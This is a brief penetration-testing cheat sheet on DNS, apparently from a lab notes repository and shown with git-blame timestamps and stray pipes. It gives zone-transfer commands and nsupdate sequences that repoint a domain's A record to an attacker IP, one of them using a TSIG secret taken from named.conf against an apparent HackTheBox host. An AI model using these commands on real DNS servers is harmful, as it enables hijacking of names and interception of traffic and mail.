2022-11-13 01:16:26 +01:00
|
|
|
# DNS
|
|
|
|
|
|
|
|
|
|
## Subdomain Enumeration
|
|
|
|
|
|
|
|
|
|
* Get all the info via
|
|
|
|
|
```sh
|
|
|
|
|
dig @$TARGET_DNS $DOMAIN axfr
|
|
|
|
|
drill @$TARGET_DNS $DOMAIN axfr
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
* [subrake](https://github.com/hash3liZer/Subrake.git)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
## Join a Domain
|
|
|
|
|
|
|
|
|
|
* Join a windows domain by setting the A record to the attacker's IP, needs cert and Pk
|
|
|
|
|
```sh
|
|
|
|
|
nsupdate
|
|
|
|
|
server <DNS-IP>
|
|
|
|
|
update delete <sub.domain.com>
|
|
|
|
|
update add <sub.domain.com> 1234 A $ATTACKER_IP
|
|
|
|
|
send
|
|
|
|
|
quit
|
|
|
|
|
```
|
|
|
|
|
* Check domain by querying the subdomain's A record via dig/drill/nslookup
|
2023-05-12 19:15:13 +02:00
|
|
|
|
|
|
|
|
### Found Secrets for Keys
|
|
|
|
|
|
|
|
|
|
If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain.
|
|
|
|
|
```sh
|
|
|
|
|
nsupdate -d -y <hash algorithm>:<name of the key>:<secret>
|
|
|
|
|
Creating key...
|
|
|
|
|
namefromtext
|
|
|
|
|
keycreate
|
|
|
|
|
|
|
|
|
|
server <domain>
|
|
|
|
|
update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP
|
|
|
|
|
send
|
|
|
|
|
```
|
|
|
|
|
|
|
|
|
|
Copy the lines, every space counts as it has to be exactly like in the example
|
|
|
|
|
|
|
|
|
|
|
